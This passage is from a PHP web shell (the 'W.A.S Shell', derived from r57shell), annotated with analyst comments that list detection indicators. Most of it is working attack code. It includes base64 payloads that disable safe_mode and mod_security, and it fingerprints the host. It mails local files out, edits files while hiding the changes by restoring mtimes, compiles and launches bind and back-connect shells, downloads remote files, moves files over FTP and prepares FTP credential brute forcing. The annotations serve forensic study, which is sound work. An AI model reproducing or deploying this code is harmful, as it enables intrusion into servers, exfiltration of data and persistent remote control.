IHt9DQpteSAkY2J1ZmZlciA9ICIiOw0KbXkgJHRidWZmZXIgPSAiIjsNCmlmICgkY2ggJiYgKHZlYygkZW91dCwgZmlsZW5vKCRjaCksIDEpIHx8IHZ
lYygkcm91dCwgZmlsZW5vKCRjaCksIDEpKSkgew0KbXkgJHJlc3VsdCA9IHN5c3JlYWQoJGNoLCAkdGJ1ZmZlciwgMTAyNCk7DQppZiAoIWRlZmluZW
QoJHJlc3VsdCkpIHsNCnByaW50IFNUREVSUiAiJCFcbiI7DQpleGl0IDA7DQp9DQppZiAoJHJlc3VsdCA9PSAwKSB7IGV4aXQgMDsgfQ0KfQ0KaWYgK
CR0aCAgJiYgICh2ZWMoJGVvdXQsIGZpbGVubygkdGgpLCAxKSAgfHwgdmVjKCRyb3V0LCBmaWxlbm8oJHRoKSwgMSkpKSB7DQpteSAkcmVzdWx0ID0g
c3lzcmVhZCgkdGgsICRjYnVmZmVyLCAxMDI0KTsNCmlmICghZGVmaW5lZCgkcmVzdWx0KSkgeyBwcmludCBTVERFUlIgIiQhXG4iOyBleGl0IDA7IH0
NCmlmICgkcmVzdWx0ID09IDApIHtleGl0IDA7fQ0KfQ0KaWYgKCRmaCAgJiYgICR0YnVmZmVyKSB7KHByaW50ICRmaCAkdGJ1ZmZlcik7fQ0Kd2hpbG
UgKG15ICRsZW4gPSBsZW5ndGgoJHRidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJHRoLCAkdGJ1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+I
DApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfQ0Kd2hpbGUgKG15ICRs
ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+IDApIHskY2J
1ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfX19DQo=";
// Analyst note: three base64 payloads that weaken the host's PHP/web-server
// hardening when written next to the shell (see the cf() calls further down):
//  - $php_ini1 decodes to a php.ini line setting safe_mode to Off;
//  - $htacces decodes to an <IfModule mod_security.c> block that sets
//    SecFilterEngine and SecFilterScanPOST to Off;
//  - $sni_res decodes to a short PHP script that include()s the paths given in
//    the "file" and "ss" query parameters around ini_restore() calls for
//    safe_mode and open_basedir.
// An unexpected php.ini, .htaccess or ini.php with this content in a web
// directory is a strong sign that this shell was used there.
$php_ini1="c2FmZV9tb2RlICAgICAgICAgICAgICAgPSAgICAgICBPZmY=";
$htacces="PElmTW9kdWxlIG1vZF9zZWN1cml0eS5jPg0KICAgIFNlY0ZpbHRlckVuZ2luZSBPZmYNCiAgICBTZWNGaWx0ZXJTY2FuUE9TVCBPZmYNCjwvSWZNb2R1bGU+";
$sni_res="PD8NCmVjaG8gaW5pX2dldCgic2FmZV9tb2RlIik7DQplY2hvIGluaV9nZXQoIm9wZW5fYmFzZWRpciIpOw0KaW5jbHVkZSgkX0dFVFsiZmlsZSJdKTsNCmluaV9yZXN0b3JlKCJzYWZlX21vZGUiKTsNCmluaV9yZXN0b3JlKCJvcGVuX2Jhc2VkaXIiKTsNCmVjaG8gaW5pX2dldCgic2FmZV9tb2RlIik7DQplY2hvIGluaV9nZXQoIm9wZW5fYmFzZWRpciIpOw0KaW5jbHVkZSgkX0dFVFsic3MiXSk7DQo/Pg==";
// Analyst note: host fingerprinting. On Unix-like hosts the shell obtains
// `uname -a`, `id` and the sysctl OS type/release through ex() (defined
// elsewhere in the file; used here as a run-command-and-return-output helper)
// and caches each result in a cookie named "uname", "id" or "sysctl".
// On later requests the values are read back from the request cookies and are
// printed into the page further down without escaping.
// Detection: HTTP responses that set cookies with these names to command
// output, and web-server child processes running uname/id/sysctl.
if($unix)
{
if(!isset($_COOKIE['uname'])) { $uname = ex('uname -a'); setcookie('uname',$uname); } else { $uname = $_COOKIE['uname']; }
if(!isset($_COOKIE['id'])) { $id = ex('id'); setcookie('id',$id); } else { $id = $_COOKIE['id']; }
// Under safe_mode the sysctl probe is skipped and shown as '-'.
if($safe_mode) { $sysctl = '-'; }
else if(isset($_COOKIE['sysctl'])) { $sysctl = $_COOKIE['sysctl']; }
else
{
// Tries the kern.* sysctl names first, then the kernel.* names.
$sysctl = ex('sysctl -n kern.ostype && sysctl -n kern.osrelease');
if(empty($sysctl)) { $sysctl = ex('sysctl -n kernel.ostype && sysctl -n kernel.osrelease'); }
if(empty($sysctl)) { $sysctl = '-'; }
setcookie('sysctl',$sysctl);
}
}
// Analyst note: renders the top banner of the shell UI: a toolbar of links back
// to the same script and a summary of the PHP environment.
// Log hunting: the toolbar links request the shell's own URL with the bare
// query strings ?phpinfo, ?phpini, ?cpu, ?mem, ?users, ?tmp, ?deface, ?ln and
// ?brute; a single PHP file receiving several of these is a useful access-log
// pattern. The page title/banner text "W.A.S Shell" is a content indicator.
echo $head;
echo '</head>';
// $serv, $addr and $current_version are assigned here but not used anywhere in
// the visible part of the file.
if(empty($_POST['cmd'])) {
$serv = array(127,192,172,10);
$addr=@explode('.', $_SERVER['SERVER_ADDR']);
$current_version = str_replace('.','',$version);
}
echo '<body><table width=100% cellpadding=0 cellspacing=0 bgcolor=Black><tr><td class=main bgcolor=Black width=160><font face=Verdana size=1>'.ws(3).' <b><font color=Red>o--{ <font color=White>W.A.S Shell</font> }--o</font></b></font></td><td class=main bgcolor=Black><font face=Verdana size=-2>';
echo ws(2)."<b>".date ("d-m-Y H:i:s")."</b>";
// $_SERVER['PHP_SELF'] is written into each href without escaping.
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpinfo title=\"".$lang[$language.'_text46']."\"><b>phpinfo</b></a> ".$rb;
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpini title=\"".$lang[$language.'_text47']."\"><b>php.ini</b></a> ".$rb;
if($unix)
{
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?cpu title=\"".$lang[$language.'_text50']."\"><b>cpu</b></a> ".$rb;
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?mem title=\"".$lang[$language.'_text51']."\"><b>mem</b></a> ".$rb;
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?users title=\"".$lang[$language.'_text95']."\"><b>users</b></a> ".$rb;
}
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?tmp title=\"".$lang[$language.'_text48']."\"><b>tmp</b></a> ".$rb;
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?deface title=\"".$lang[$language.'_text49']."\"><b>deface</b></a> ".$rb;
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?ln title=\"".$lang[$language.'_text49']."\"><b>ln -s all</b></a> ".$rb;
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?brute title=\"".$lang[$language.'_text49']."\"><b>brute</b></a> ".$rb;
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?users title=\"".$lang[$language.'_text49']."\"><b>users</b></a> ".$rb."<br>";
// Environment summary: safe_mode state, PHP version, and whether the cURL,
// MySQL, MSSQL, PostgreSQL and Oracle client functions exist in this PHP build.
echo ws(2)."safe_mode: <b>";
echo (($safe_mode)?("<font color=#DF0000>ON</font>"):("<font color=#DF0000>OFF</font>"));
echo "</b>".ws(2);
echo "PHP version: <b>".@phpversion()."</b>";
$curl_on = @function_exists('curl_version');
echo ws(2);
echo "cURL: <b>".(($curl_on)?("<font color=#DF0000>ON</font>"):("<font color=#DF0000>OFF</font>"));
echo "</b>".ws(2);
echo "MySQL: <b>";
$mysql_on = @function_exists('mysql_connect');
if($mysql_on){
echo "<font color=#DF0000>ON</font>"; } else { echo "<font color=#DF0000>OFF</font>"; }
echo "</b>".ws(2);
echo "MSSQL: <b>";
$mssql_on = @function_exists('mssql_connect');
if($mssql_on){echo "<font color=#DF0000>ON</font>";}else{echo "<font color=#DF0000>OFF</font>";}
echo "</b>".ws(2);
echo "PostgreSQL: <b>";
$pg_on = @function_exists('pg_connect');
if($pg_on){echo "<font color=#DF0000>ON</font>";}else{echo "<font color=#DF0000>OFF</font>";}
echo "</b>".ws(2);
echo "Oracle: <b>";
$ora_on = @function_exists('ocilogon');
if($ora_on){echo "<font color=#DF0000>ON</font>";}else{echo "<font color=#DF0000>OFF</font>";}
echo "</b><br>".ws(2);
// Shows the disable_functions setting, i.e. which PHP functions the host has blocked.
echo "Disable functions : <b>";
if(''==($df=@ini_get('disable_functions'))){echo "<font color=#DF0000>NONE</font></b>";}else{echo "<font color=#DF0000>$df</font></b>";}
// Free and total disk space for the current directory; failures fall back to 0.
$free = @diskfreespace($dir);
if (!$free) {$free = 0;}
$all = @disk_total_space($dir);
if (!$all) {$all = 0;}
echo "<br>".ws(2)."Free space : <b>".view_size($free)."</b> Total space: <b>".view_size($all)."</b>";
// Analyst note: second banner panel. Prints the host identity gathered earlier
// (uname, sysctl, $OSTYPE, server software, effective user/group, current
// directory and its permissions). $uname, $sysctl and $id may come straight
// from request cookies and are echoed without HTML escaping.
echo '</font></td></tr><table>
<table width=100% cellpadding=0 cellspacing=0 bgcolor=#333333>
<tr><td class=main align=right width=100>';
echo $font;
if($unix){
echo '<font color=White><b>uname -a :'.ws(1).'<br>sysctl :'.ws(1).'<br>$OSTYPE :'.ws(1).'<br>Server :'.ws(1).'<br>id :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
echo '</td><td class=main>';
echo "<font face=Verdana size=-2 color=#DF0000><b>";
// Falls back to php_uname() when no uname value was obtained; output capped at 120 chars.
echo((!empty($uname))?(ws(3).@substr($uname,0,120)."<br>"):(ws(3).@substr(@php_uname(),0,120)."<br>"));
echo ws(3).$sysctl."<br>";
// Runs a shell command on every page load just to read $OSTYPE.
echo ws(3).ex('echo $OSTYPE')."<br>";
echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
// Identity: prefer the cached `id` output, then the posix_* functions, then
// PHP's own get_current_user()/getmyuid()/getmygid().
if(!empty($id)) { echo ws(3).$id."<br>"; }
else if(function_exists('posix_geteuid') && function_exists('posix_getegid') && function_exists('posix_getgrgid') && function_exists('posix_getpwuid'))
{
$euserinfo = @posix_getpwuid(@posix_geteuid());
$egroupinfo = @posix_getgrgid(@posix_getegid());
echo ws(3).'uid='.$euserinfo['uid'].' ( '.$euserinfo['name'].' ) gid='.$egroupinfo['gid'].' ( '.$egroupinfo['name'].' )<br>';
}
else echo ws(3)."user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()."<br>";
echo ws(3).$dir;
echo ws(3).'( '.perms(@fileperms($dir)).' )';
echo "</b></font>";
}
else
{
// Non-Unix branch: OS string, server software, USERNAME environment variable, current directory.
echo '<font color=White><b>OS :'.ws(1).'<br>Server :'.ws(1).'<br>User :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
echo '</td><td class=main>';
echo "<font face=Verdana size=-2 color=#DF0000><b>";
echo ws(3).@substr(@php_uname(),0,120)."<br>";
echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
echo ws(3).@getenv("USERNAME")."<br>";
echo ws(3).$dir;
echo "<br></font>";
}
echo "</font>";
echo "</td></tr></table>";
$f = '<br>';
// Analyst note: cmd=mail sends an e-mail through PHP's mail() with recipient,
// subject, body and From header all taken from the POST body; the From value
// is concatenated into the header string as-is. Outbound mail originating from
// the web-server account is the observable side effect.
if(!empty($_POST['cmd']) && $_POST['cmd']=="mail")
{
$res = mail($_POST['to'],$_POST['subj'],$_POST['text'],"From: ".$_POST['from']."\r\n");
// err() is defined elsewhere; the message index is offset by mail()'s boolean result.
err(6+$res);
$_POST['cmd']="";
}
// Analyst note: cmd=mail_file is a data-exfiltration path. It reads any local
// file the PHP process can open and mails it as an attachment (optionally
// compressed via compress(), defined elsewhere) to an address from the POST body.
// Mail-log hunting: when the operator leaves the fields empty the subject
// defaults to 'file from r57shell' and the sender to 'billy@microsoft.com'.
if(!empty($_POST['cmd']) && $_POST['cmd']=="mail_file" && !empty($_POST['loc_file']))
{
if(!$file=@fopen($_POST['loc_file'],"r")) { err(1,$_POST['loc_file']); $_POST['cmd']=""; }
else
{
$filename = @basename($_POST['loc_file']);
// Whole file is read into memory in one call.
$filedump = @fread($file,@filesize($_POST['loc_file']));
fclose($file);
$content_encoding=$mime_type='';
// NOTE(review): compress() appears to modify $filename/$filedump and the two
// variables above by reference or as globals - confirm against its definition.
compress($filename,$filedump,$_POST['compress']);
$attach = array(
"name"=>$filename,
"type"=>$mime_type,
"content"=>$filedump
);
if(empty($_POST['subj'])) { $_POST['subj'] = 'file from r57shell'; }
if(empty($_POST['from'])) { $_POST['from'] = 'billy@microsoft.com'; }
$res = mailattach($_POST['to'],$_POST['from'],$_POST['subj'],$attach);
err(6+$res);
$_POST['cmd']="";
}
}
// Analyst note: cmd=find_text rewrites the pending command into a
// "find ... | xargs grep -E" shell pipeline assembled from three POST fields
// with no escaping; the resulting string is executed later like any other
// shell command. Process telemetry shows find/xargs/grep spawned by the
// web-server account.
if(!empty($_POST['cmd']) && $_POST['cmd'] == "find_text")
{
$_POST['cmd'] = 'find '.$_POST['s_dir'].' -name \''.$_POST['s_mask'].'\' | xargs grep -E \''.$_POST['s_text'].'\'';
}
// Analyst note: cmd=ch_ changes ownership, group or mode of an arbitrary path
// (param1) to the value in param2. All three calls are error-suppressed, so a
// failed change produces no output or PHP warning.
if(!empty($_POST['cmd']) && $_POST['cmd']=="ch_")
{
switch($_POST['what'])
{
case 'own':
@chown($_POST['param1'],$_POST['param2']);
break;
case 'grp':
@chgrp($_POST['param1'],$_POST['param2']);
break;
case 'mod':
// The mode string is parsed as octal (base 8).
@chmod($_POST['param1'],intval($_POST['param2'], 8));
break;
}
$_POST['cmd']="";
}
// Analyst note: cmd=mk creates or deletes a file or directory at the path in
// mk_name, selected by the "what" (file|dir) and "action" (create|delete)
// POST fields. The path is used exactly as supplied.
if(!empty($_POST['cmd']) && $_POST['cmd']=="mk")
{
switch($_POST['what'])
{
case 'file':
if($_POST['action'] == "create")
{
// Refuses to overwrite an existing file; on success the request is turned
// into an edit_file request for the new, empty file.
if(file_exists($_POST['mk_name']) || !$file=@fopen($_POST['mk_name'],"w")) { err(2,$_POST['mk_name']); $_POST['cmd']=""; }
else {
fclose($file);
$_POST['e_name'] = $_POST['mk_name'];
$_POST['cmd']="edit_file";
echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#333333><tr><td class=main bgcolor=Black><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text61']."</b></font></div></td></tr></table>";
}
}
else if($_POST['action'] == "delete")
{
// unlink() is not error-suppressed here, so a failed delete can raise a PHP warning.
if(unlink($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#333333><tr><td class=main bgcolor=Black><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text63']."</b></font></div></td></tr></table>";
$_POST['cmd']="";
}
break;
case 'dir':
if($_POST['action'] == "create"){
if(mkdir($_POST['mk_name']))
{
$_POST['cmd']="";
echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#333333><tr><td class=main bgcolor=Black><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text62']."</b></font></div></td></tr></table>";
}
else { err(2,$_POST['mk_name']); $_POST['cmd']=""; }
}
else if($_POST['action'] == "delete"){
// rmdir() only removes the directory named; no recursion is done here.
if(rmdir($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#333333><tr><td class=main bgcolor=Black><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text64']."</b></font></div></td></tr></table>";
$_POST['cmd']="";
}
break;
}
}
// Analyst note: cmd=edit_file opens the file named in e_name and renders its
// contents in a <textarea> inside a form that posts back with cmd=save_file.
// The file contents go through htmlspecialchars(), but e_name and $dir are
// written into the page and into hidden-field values unescaped and unquoted.
if(!empty($_POST['cmd']) && $_POST['cmd']=="edit_file" && !empty($_POST['e_name']))
{
// First probe: if the file cannot be opened read/write, mark it read-only in the UI.
if(!$file=@fopen($_POST['e_name'],"r+")) { $only_read = 1; @fclose($file); }
if(!$file=@fopen($_POST['e_name'],"r")) { err(1,$_POST['e_name']); $_POST['cmd']=""; }
else {
echo $table_up3;
echo $font;
echo "<form name=save_file method=post>";
echo ws(3)."<b>".$_POST['e_name']."</b>";
echo "<div align=center><textarea name=e_text cols=121 rows=24>";
echo @htmlspecialchars(@fread($file,@filesize($_POST['e_name'])));
fclose($file);
echo "</textarea>";
echo "<input type=hidden name=e_name value=".$_POST['e_name'].">";
echo "<input type=hidden name=dir value=".$dir.">";
echo "<input type=hidden name=cmd value=save_file>";
// Read-only files get a notice instead of the submit button.
echo (!empty($only_read)?("<br><br>".$lang[$language.'_text44']):("<br><br><input type=submit name=submit value=\" ".$lang[$language.'_butt10']." \">"));
echo "</div>";
echo "</font>";
echo "</form>";
echo "</td></tr></table>";
// Page rendering stops here; nothing below runs for an edit_file request.
exit();
}
}
// Analyst note: cmd=save_file overwrites the file named in e_name with the
// posted text and then restores the file's previous modification and access
// times with touch(). Forensics: for files edited through this shell the mtime
// is deliberately misleading - rely on inode change time (ctime), file
// integrity baselines or backups when building a timeline.
if(!empty($_POST['cmd']) && $_POST['cmd']=="save_file")
{
// Original mtime is captured before the file is opened for writing.
$mtime = @filemtime($_POST['e_name']);
if(!$file=@fopen($_POST['e_name'],"w")) { err(0,$_POST['e_name']); }
else {
// Browser-submitted CRLF line endings are normalised to LF on Unix hosts.
if($unix) $_POST['e_text']=@str_replace("\r\n","\n",$_POST['e_text']);
@fwrite($file,$_POST['e_text']);
// NOTE(review): the handle is never closed explicitly in this branch.
@touch($_POST['e_name'],$mtime,$mtime);
$_POST['cmd']="";
echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#333333><tr><td class=main bgcolor=Black><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text45']."</b></font></div></td></tr></table>";
}
}
// Analyst note: drops and starts the C listener payload. cf() is defined
// elsewhere in the file and is called as cf(path, base64 payload) - presumably
// it decodes and writes the file; confirm against its definition.
// Host indicators: /tmp/bd.c (removed right after compilation), /tmp/bd, a gcc
// process and a long-running /tmp/bd process owned by the web-server account.
// The port and password POST values are placed on the command line unescaped.
// Hardening that breaks this step: no compiler on web hosts and /tmp mounted noexec.
if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C"))
{
cf("/tmp/bd.c",$port_bind_bd_c);
$blah = ex("gcc -o /tmp/bd /tmp/bd.c");
@unlink("/tmp/bd.c");
$blah = ex("/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." &");
// The follow-up command lists processes so the operator can see whether it started.
$_POST['cmd']="ps -aux | grep bd";
}
// Analyst note: three configuration-tampering actions. Each writes one of the
// embedded payloads, via cf() (defined elsewhere), to a relative path, i.e.
// into the script's current working directory:
//   php.ini    <- $php_ini1 (turns safe_mode off)
//   .htaccess  <- $htacces  (turns the mod_security filter engine off)
//   ini.php    <- $sni_res  (small include()-based helper script)
// Detection: new or modified php.ini, .htaccess or ini.php files in web
// directories; compare against deployment baselines. The status strings
// assigned to $_POST['cmd'] are operator-facing messages, not commands.
if (!empty($_POST['php_ini1']))
{
cf("php.ini",$php_ini1);
$_POST['cmd']=" Da write xong php.ini thu? thu? coi di";
}
if (!empty($_POST['htacces']))
{
cf(".htaccess",$htacces);
$_POST['cmd']="Da write xong htaccess thu? thu? coi di ";
}
if (!empty($_POST['file_ini']))
{
cf("ini.php",$sni_res);
$_POST['cmd']=" http://target.com/ini.php?ss=http://shell.txt? Da write xong ini.php thu xem ^^!";
}
// Analyst note: the remaining payload launchers. Every branch writes an
// embedded payload under /tmp through cf() (defined elsewhere), runs it in the
// background through ex(), and places POST values on the command line
// unescaped. File indicators on this page: /tmp/bdpl, /tmp/back, /tmp/back.c,
// /tmp/backc, /tmp/dp, /tmp/dpc.c, /tmp/dpc. Behavioural indicators: perl or
// gcc started by the web-server account, new listening sockets or outbound
// connections owned by that account. Egress filtering for the web tier,
// /tmp mounted noexec and the absence of a compiler limit these branches.

// Perl listener. bind_pass must be non-empty to enter the branch but is not
// passed to the script, which takes only the port.
if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl"))
{
cf("/tmp/bdpl",$port_bind_bd_pl);
$p2=which("perl");
$blah = ex($p2." /tmp/bdpl ".$_POST['port']." &");
$_POST['cmd']="ps -aux | grep bdpl";
}
// Perl outbound-connect payload, given the operator's IP and port.
if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl"))
{
cf("/tmp/back",$back_connect);
$p2=which("perl");
$blah = ex($p2." /tmp/back ".$_POST['ip']." ".$_POST['port']." &");
$_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
}
// C outbound-connect payload; the source file is deleted after compilation.
if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C"))
{
cf("/tmp/back.c",$back_connect_c);
$blah = ex("gcc -o /tmp/backc /tmp/back.c");
@unlink("/tmp/back.c");
$blah = ex("/tmp/backc ".$_POST['ip']." ".$_POST['port']." &");
$_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
}
// Perl port-forwarder ("datapipe"): local port -> remote host:port.
if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="Perl"))
{
cf("/tmp/dp",$datapipe_pl);
$p2=which("perl");
$blah = ex($p2." /tmp/dp ".$_POST['local_port']." ".$_POST['remote_host']." ".$_POST['remote_port']." &");
$_POST['cmd']="ps -aux | grep dp";
}
// C port-forwarder; note the argument order differs from the Perl variant
// (local port, remote port, remote host).
if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="C"))
{
cf("/tmp/dpc.c",$datapipe_c);
$blah = ex("gcc -o /tmp/dpc /tmp/dpc.c");
@unlink("/tmp/dpc.c");
$blah = ex("/tmp/dpc ".$_POST['local_port']." ".$_POST['remote_port']." ".$_POST['remote_host']." &");
$_POST['cmd']="ps -aux | grep dpc";
}
// Replaces the pending command with a predefined one from $aliases (defined elsewhere).
if (!empty($_POST['alias']) && isset($aliases[$_POST['alias']])) { $_POST['cmd'] = $aliases[$_POST['alias']]; }
// Analyst note: file upload. The uploaded file is copied into the directory
// named by the "dir" POST field under either the client-supplied file name or
// the "new_name" POST field, with no validation of name, path or type.
// $HTTP_POST_FILES is the legacy name for the upload array; the upload form
// field is "userfile". Multipart POSTs to a single PHP file carrying a
// "userfile" part are a request-level indicator.
if (!empty($HTTP_POST_FILES['userfile']['name']))
{
if(!empty($_POST['new_name'])) { $nfn = $_POST['new_name']; }
else { $nfn = $HTTP_POST_FILES['userfile']['name']; }
@copy($HTTP_POST_FILES['userfile']['tmp_name'],
$_POST['dir']."/".$nfn)
or print("<font color=#DF0000 face=Fixedsys><div align=center>Error uploading file ".$HTTP_POST_FILES['userfile']['name']."</div></font>");
}
// Analyst note: remote download. Builds a shell command that fetches rem_file
// to loc_file with whichever client the operator picked (wget, fetch, lynx,
// links, GET or curl); both values are concatenated unescaped and the command
// is executed later with the rest of the shell's command handling.
// Detection: download utilities spawned by the web-server account and
// outbound HTTP/FTP from the web tier.
// The case labels are bare words rather than quoted strings, so they depend on
// PHP's handling of undefined constants, which differs between PHP versions.
if (!empty($_POST['with']) && !empty($_POST['rem_file']) && !empty($_POST['loc_file']))
{
switch($_POST['with'])
{
case wget:
$_POST['cmd'] = which('wget')." ".$_POST['rem_file']." -O ".$_POST['loc_file']."";
break;
case fetch:
$_POST['cmd'] = which('fetch')." -o ".$_POST['loc_file']." -p ".$_POST['rem_file']."";
break;
case lynx:
$_POST['cmd'] = which('lynx')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
break;
case links:
$_POST['cmd'] = which('links')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
break;
case GET:
$_POST['cmd'] = which('GET')." ".$_POST['rem_file']." > ".$_POST['loc_file']."";
break;
case curl:
$_POST['cmd'] = which('curl')." ".$_POST['rem_file']." -o ".$_POST['loc_file']."";
break;
}
}
// Analyst note: FTP transfer in either direction using PHP's ftp_* functions,
// with server, credentials, paths and transfer mode taken from the POST body.
// ftp_file_up sends a local file out (exfiltration); ftp_file_down pulls a
// remote file onto the host (tool staging). Outbound FTP control connections
// from the web-server account are the network indicator.
if(!empty($_POST['cmd']) && ($_POST['cmd']=="ftp_file_up" || $_POST['cmd']=="ftp_file_down"))
{
// "host:port" is split on ':'; port defaults to 21. split() is a legacy
// function that was removed in PHP 7.
list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);
if(empty($ftp_port)) { $ftp_port = 21; }
// 10-second connect timeout.
$connection = @ftp_connect ($ftp_server,$ftp_port,10);
if(!$connection) { err(3); }
else
{
if(!@ftp_login($connection,$_POST['ftp_login'],$_POST['ftp_password'])) { err(4); }
else
{
// When the local target equals the current directory, the remote file's base name is appended.
if($_POST['cmd']=="ftp_file_down") { if(chop($_POST['loc_file'])==$dir) { $_POST['loc_file']=$dir.((!$unix)?('\\'):('/')).basename($_POST['ftp_file']); } @ftp_get($connection,$_POST['loc_file'],$_POST['ftp_file'],$_POST['mode']); }
if($_POST['cmd']=="ftp_file_up") { @ftp_put($connection,$_POST['ftp_file'],$_POST['loc_file'],$_POST['mode']); }
}
}
// Called even when the connection failed; the @ hides the resulting error.
@ftp_close($connection);
$_POST['cmd'] = "";
}
// Analyst note: pre-check for the shell's FTP credential-guessing feature.
// This section only verifies that the FTP server is reachable and that
// get_users() (defined elsewhere) returns a user list, then closes the
// connection; when both checks pass $_POST['cmd'] is left as "ftp_brute" for
// code outside this section. Many failed FTP logins originating from a web
// server's own address are the matching server-side indicator.
if(!empty($_POST['cmd']) && $_POST['cmd']=="ftp_brute")
{
list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);
if(empty($ftp_port)) { $ftp_port = 21; }
$connection = @ftp_connect ($ftp_server,$ftp_port,10);
if(!$connection) { err(3); $_POST['cmd'] = ""; }
else if(!$users=get_users()) { echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#333333><tr><td class=main bgcolor=Black><font color=#DF0000 face=Verdana size=-2><div align=center><b>".$lang[$language.'_text96']."</b></div></font></td></tr></table>"; $_POST['cmd'] = ""; }
@ftp_close($connection);
}
// Analyst note: when no command is pending, a default directory listing is
// chosen: "dir" on Windows, "ls -lia" on Unix, or the built-in "safe_dir"
// lister when safe_mode is on. The command string is then echoed into the page
// unescaped, followed by the opening of the "report" textarea that receives
// the command output.
echo $table_up3;
if (empty($_POST['cmd'])&&!$safe_mode) { $_POST['cmd']=(!$unix)?("dir"):("ls -lia"); }
else if(empty($_POST['cmd'])&&$safe_mode){ $_POST['cmd']="safe_dir"; }
echo $font.$lang[$language.'_text1'].": <b>".$_POST['cmd']."</b></font></td></tr><tr><td class=main><b><div align=center><textarea name=report cols=121 rows=15 spellcheck='false'>";
// Copies everything readable from $link to $file. $link is passed to fopen()
// unchanged, so it can be any path or stream wrapper fopen() accepts on the
// host; the caller below supplies both values from the POST body.
// NOTE(review): both fopen() calls are error-suppressed and their results are
// not checked, and $cont is appended to without being initialised.
function dozip1($link,$file)
{
$fp = @fopen($link,"r");
// Reads the source in 1024-byte chunks into memory.
while(!feof($fp))
{
$cont.= fread($fp,1024);
}
fclose($fp);
// Destination is opened in "w" mode, replacing any existing file.
$fp2 = @fopen($file,"w");
fwrite($fp2,$cont);
fclose($fp2);
}
// Copy action: source "funzip" and destination "fzip" both come from the POST body.
if (isset($_POST['funzip']))
{
dozip1($_POST['funzip'],$_POST['fzip']);
}
// Analyst note: directory-name discovery through error messages. The code
// installs eh() as the PHP error handler and calls glob() on "$root/<prefix>*"
// for one- to four-character prefixes; glob()'s return value is discarded, and
// only the path text that eh() extracts from safe_mode restriction warnings is
// collected in $D. It depends on PHP's legacy safe_mode warning wording.
// Logging impact: eh() does not return false, so while it is installed PHP's
// standard error handling is bypassed for the errors it receives; the handler
// is never restored in the visible code, so PHP error logs may be silent for
// the rest of the request.
if(empty($_POST['root'])){
} else {
$root = $_POST['root']; }
// $c is the next write index into $D; both are shared with eh() through globals.
$c = 0; $D = array();
set_error_handler("eh");
$chars = "_-.01234567890abcdefghijklnmopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
for($i=0; $i < strlen($chars); $i++){
$path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}";
// Remember the last recorded entry so a change after glob() can be detected.
$prevD = $D[count($D)-1];
glob($path."*");
// A deeper prefix level is only tried when the previous level recorded a new entry.
if($D[count($D)-1] != $prevD){
for($j=0; $j < strlen($chars); $j++){
$path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}";
$prevD2 = $D[count($D)-1];
glob($path."*");
if($D[count($D)-1] != $prevD2){
for($p=0; $p < strlen($chars); $p++){
$path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}{$chars[$p]}";
$prevD3 = $D[count($D)-1];
glob($path."*");
if($D[count($D)-1] != $prevD3){
for($r=0; $r < strlen($chars); $r++){
$path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}{$chars[$p]}{$chars[$r]}";
glob($path."*");
}
}
}
}
}
}
}
